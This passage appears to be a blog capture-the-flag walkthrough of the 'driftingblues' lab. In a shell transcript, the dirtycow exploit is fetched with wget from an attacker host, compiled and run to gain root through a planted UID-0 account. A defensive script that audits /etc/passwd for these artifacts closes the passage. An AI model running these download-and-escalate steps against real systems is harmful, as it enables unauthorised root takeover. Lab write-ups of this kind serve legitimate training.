HISTFILESIZE=0                                                                                                                                                                                                                       
SHLVL=2
OLDPWD=/home
APACHE_RUN_DIR=/var/run/apache2
APACHE_PID_FILE=/var/run/apache2.pid
_=./linpeas.sh
PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/sbin:/usr/sbin:/sbin
APACHE_LOCK_DIR=/var/lock/apache2
LANG=C
HISTSIZE=0
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data
APACHE_LOG_DIR=/var/log/apache2
PWD=/tmp
HISTFILE=/dev/null

╔══════════╣ Searching Signature verification failed in dmesg
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#dmesg-signature-verification-failed                                                                                                                               
dmesg Not Found                                                                                                                                                                                                                      
                                                                                                                                                                                                                                     
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester                                                                                                                                                                                   
cat: write error: Broken pipe                                                                                                                                                                                                        
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
[+] [CVE-2016-5195] dirtycow

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: [ debian=7|8 ],RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04
   Download URL: https://www.exploit-db.com/download/40611
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2016-5195] dirtycow 2

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: [ debian=7|8 ],RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
   Download URL: https://www.exploit-db.com/download/40839
   ext-url: https://www.exploit-db.com/download/40847
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

From the linpeas.sh output we can use dirtycow 2 for local privilege escalation; the linpeas.sh output already includes the download address of the exploit code. Download the C source to Kali Linux, upload it to the target host's /tmp directory, compile it following the steps described in the code's own comments, and then run it, which yields root privileges.

www-data@driftingblues:/var/www$ cd /tmp
cd /tmp
www-data@driftingblues:/tmp$ wget http://192.168.56.137:8000/40839.c
wget http://192.168.56.137:8000/40839.c
--2022-11-20 03:18:05--  http://192.168.56.137:8000/40839.c
Connecting to 192.168.56.137:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5006 (4.9K) [text/x-csrc]
Saving to: `40839.c'

100%[======================================>] 5,006       --.-K/s   in 0s      

2022-11-20 03:18:05 (1.09 GB/s) - `40839.c' saved [5006/5006]

www-data@driftingblues:/tmp$ ls
ls
40839.c  linpeas.sh
www-data@driftingblues:/tmp$ gcc -pthread 40839.c -o dirty -lcrypt
gcc -pthread 40839.c -o dirty -lcrypt
www-data@driftingblues:/tmp$ ls
ls
40839.c  dirty linpeas.sh
www-data@driftingblues:/tmp$ chmod +x dirty
chmod +x dirty
www-data@driftingblues:/tmp$ ./dirty
./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: 12345

Complete line:
firefart:fi3LLch28IK7A:0:0:pwned:/root:/bin/bash

mmap: 7fb172436000
id
id
su - firefart
su - firefart
madvise 0

ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '12345'.


DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '12345'.


DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
www-data@driftingblues:/tmp$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@driftingblues:/tmp$ su - firefart
Password: 12345

firefart@driftingblues:~# id
id
uid=0(firefart) gid=0(root) groups=0(root)
firefart@driftingblues:~# cd /root
cd /root
firefart@driftingblues:~# ls -alh
ls -alh
total 20K
drwx------  3 firefart root 4.0K Mar 17  2021 .
drwxr-xr-x 23 firefart root 4.0K Mar 17  2021 ..
drwx------  2 firefart root 4.0K Mar 17  2021 .aptitude
-rw-------  1 firefart root  165 Mar 17  2021 .bash_history
-r-x------  1 firefart root 1.8K Mar 17  2021 flag.txt
firefart@driftingblues:~# cat flag.txt
cat flag.txt

░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
░░░░█░░░░░░░░░░░░░░░░░░░░░░█
░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
█░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
█░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
░░▐▌░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
░░░█▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
░░█░░▌░█░░█░░█░░░█░░█░░█
░░█░░▀▀░░██░░█░░░█░░█░░█
░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█

congratulations!

firefart@driftingblues:~# 
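Looked at from the defender's side, the run above leaves two unmistakable artifacts in /etc/passwd: a second UID-0 account, and a crypt hash written directly into the password field instead of living in /etc/shadow (the `firefart:fi3LLch28IK7A:0:0:...` line the tool printed). The script below is an added example of my own, not part of the original write-up and not taken from 40839.c; it audits any passwd-format file for both conditions. The function names are my own choice and the sample file it builds is constructed to mirror the state of the box after the run.

```shell
#!/bin/sh
# Added example (not from the original write-up): audit a passwd-format file
# for the artifacts a dirtycow-style /etc/passwd rewrite leaves behind.

# find_rogue_root FILE -> prints "name:uid" for every UID-0 entry that is not root
find_rogue_root() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 ":" $3 }' "$1"
}

# find_inline_hashes FILE -> prints every account whose password field is a
# real hash rather than a shadow placeholder (x, *, !, !!, or empty)
find_inline_hashes() {
    awk -F: '$2 != "x" && $2 != "*" && $2 != "!" && $2 != "!!" && $2 != "" { print $1 }' "$1"
}

# audit_passwd FILE -> prints each finding; exit status 1 if anything was
# found, 0 if the file looks clean
audit_passwd() {
    rc=0
    for n in $(find_rogue_root "$1"); do
        echo "FINDING: non-root account with uid 0: $n"
        rc=1
    done
    for n in $(find_inline_hashes "$1"); do
        echo "FINDING: password hash stored inline in passwd for: $n"
        rc=1
    done
    return $rc
}

# Constructed sample: the shape of /etc/passwd after the run shown above.
SAMPLE_PASSWD=$(mktemp)
cat > "$SAMPLE_PASSWD" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
firefart:fi3LLch28IK7A:0:0:pwned:/root:/bin/bash
EOF

if audit_passwd "$SAMPLE_PASSWD"; then
    echo "passwd looks clean"
else
    echo "passwd shows privilege-escalation artifacts"
fi
rm -f "$SAMPLE_PASSWD"
```

On a real host run `audit_passwd /etc/passwd` (as root, since the file is world-readable this also works unprivileged). A leftover `/tmp/passwd.bak`, which the tool writes before patching the file, is a second indicator worth checking alongside the passwd contents, and restoring from it is the recovery step the tool itself reminds you of.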
posted @ 2022-11-20 17:39  Jason_huawen